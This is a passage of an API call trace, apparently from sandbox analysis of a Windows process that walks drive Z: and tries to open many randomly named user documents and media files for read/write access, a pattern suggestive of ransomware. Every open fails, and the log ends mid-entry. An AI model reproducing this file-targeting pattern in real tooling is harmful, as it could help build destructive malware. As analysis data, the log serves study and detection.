RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.513] PathFindExtensionW (pszPath="Z:\\I235155.jpg") returned=".jpg" [0187.518] CreateFileW (lpFileName="Z:\\I235155.jpg" (normalized: "z:\\i235155.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.520] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x178d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jZ8QQ.png", cAlternateFileName="")) returned 1 [0187.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.520] PathFindExtensionW (pszPath="Z:\\jZ8QQ.png") returned=".png" [0187.525] CreateFileW (lpFileName="Z:\\jZ8QQ.png" (normalized: "z:\\jz8qq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.527] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcbff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hHQWi5hCV.pdf", cAlternateFileName="")) returned 1 [0187.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.527] PathFindExtensionW (pszPath="Z:\\hHQWi5hCV.pdf") returned=".pdf" [0187.532] CreateFileW (lpFileName="Z:\\hHQWi5hCV.pdf" (normalized: "z:\\hhqwi5hcv.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.534] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xdd63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jBgQDjljdAi8Iv2PL.gif", cAlternateFileName="")) returned 1 [0187.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.534] PathFindExtensionW (pszPath="Z:\\jBgQDjljdAi8Iv2PL.gif") returned=".gif" [0187.540] CreateFileW (lpFileName="Z:\\jBgQDjljdAi8Iv2PL.gif" (normalized: "z:\\jbgqdjljdai8iv2pl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.541] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17642, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HcsLtIJlEmM0NTPGs.xls", cAlternateFileName="")) returned 1 [0187.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.542] PathFindExtensionW (pszPath="Z:\\HcsLtIJlEmM0NTPGs.xls") returned=".xls" [0187.547] CreateFileW (lpFileName="Z:\\HcsLtIJlEmM0NTPGs.xls" (normalized: "z:\\hcsltijlemm0ntpgs.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.548] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QfHsttYoiqOGUUjwI5r.swf", cAlternateFileName="")) returned 1 [0187.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.548] PathFindExtensionW (pszPath="Z:\\QfHsttYoiqOGUUjwI5r.swf") returned=".swf" [0187.553] CreateFileW (lpFileName="Z:\\QfHsttYoiqOGUUjwI5r.swf" (normalized: "z:\\qfhsttyoiqoguujwi5r.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.555] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x607c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8me2d.pptx", cAlternateFileName="")) returned 1 [0187.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.555] PathFindExtensionW (pszPath="Z:\\8me2d.pptx") returned=".pptx" [0187.560] CreateFileW (lpFileName="Z:\\8me2d.pptx" (normalized: "z:\\8me2d.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.562] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9697, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K7PKxXbGrKXfVhE.ppt", cAlternateFileName="")) returned 1 [0187.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.562] PathFindExtensionW (pszPath="Z:\\K7PKxXbGrKXfVhE.ppt") returned=".ppt" [0187.567] CreateFileW (lpFileName="Z:\\K7PKxXbGrKXfVhE.ppt" (normalized: "z:\\k7pkxxbgrkxfvhe.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.569] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa60c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yFDjrYVFhxr1o.rtf", cAlternateFileName="")) returned 1 [0187.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.569] PathFindExtensionW (pszPath="Z:\\yFDjrYVFhxr1o.rtf") returned=".rtf" [0187.574] CreateFileW (lpFileName="Z:\\yFDjrYVFhxr1o.rtf" (normalized: "z:\\yfdjryvfhxr1o.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.575] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x142d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvxie8.docx", cAlternateFileName="")) returned 1 [0187.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.575] PathFindExtensionW (pszPath="Z:\\uvxie8.docx") returned=".docx" [0187.580] CreateFileW (lpFileName="Z:\\uvxie8.docx" (normalized: "z:\\uvxie8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.581] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfe90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aVdNk.pps", cAlternateFileName="")) returned 1 [0187.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.581] PathFindExtensionW (pszPath="Z:\\aVdNk.pps") returned=".pps" [0187.585] CreateFileW (lpFileName="Z:\\aVdNk.pps" (normalized: "z:\\avdnk.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.586] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf47b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="igduZ1s2R.xlsx", cAlternateFileName="")) returned 1 [0187.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.586] PathFindExtensionW (pszPath="Z:\\igduZ1s2R.xlsx") returned=".xlsx" [0187.590] CreateFileW (lpFileName="Z:\\igduZ1s2R.xlsx" (normalized: "z:\\igduz1s2r.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.591] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcb6c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RtBpO.pps", cAlternateFileName="")) returned 1 [0187.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.591] PathFindExtensionW (pszPath="Z:\\RtBpO.pps") returned=".pps" [0187.595] CreateFileW (lpFileName="Z:\\RtBpO.pps" (normalized: "z:\\rtbpo.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.596] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12aca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ekGGyeqFk2bhWU.jpg", cAlternateFileName="")) returned 1 [0187.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.596] PathFindExtensionW (pszPath="Z:\\ekGGyeqFk2bhWU.jpg") returned=".jpg" [0187.599] CreateFileW (lpFileName="Z:\\ekGGyeqFk2bhWU.jpg" (normalized: "z:\\ekggyeqfk2bhwu.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.600] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Daynev4hNYGuoMWbxLXC.pptx", cAlternateFileName="")) returned 1 [0187.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.601] PathFindExtensionW (pszPath="Z:\\Daynev4hNYGuoMWbxLXC.pptx") returned=".pptx" [0187.604] CreateFileW (lpFileName="Z:\\Daynev4hNYGuoMWbxLXC.pptx" (normalized: "z:\\daynev4hnyguomwbxlxc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.605] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x147e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4s6BCb3WGeEnQU.bmp", cAlternateFileName="")) returned 1 [0187.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.606] PathFindExtensionW (pszPath="Z:\\4s6BCb3WGeEnQU.bmp") returned=".bmp" [0187.609] CreateFileW (lpFileName="Z:\\4s6BCb3WGeEnQU.bmp" (normalized: "z:\\4s6bcb3wgeenqu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.610] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1594c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v0CV5yZU8GBZK.flv", cAlternateFileName="")) returned 1 [0187.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.610] PathFindExtensionW (pszPath="Z:\\v0CV5yZU8GBZK.flv") returned=".flv" [0187.614] CreateFileW (lpFileName="Z:\\v0CV5yZU8GBZK.flv" (normalized: "z:\\v0cv5yzu8gbzk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.622] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xgOBxEjMJN.swf", cAlternateFileName="")) returned 1 [0187.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.622] PathFindExtensionW (pszPath="Z:\\xgOBxEjMJN.swf") returned=".swf" [0187.626] CreateFileW (lpFileName="Z:\\xgOBxEjMJN.swf" (normalized: "z:\\xgobxejmjn.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.628] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xgOBxEjMJN.swf", cAlternateFileName="")) returned 0 [0187.628] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0187.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.651] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0187.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0187.659] HeapFree (in: hHeap=0x620000, 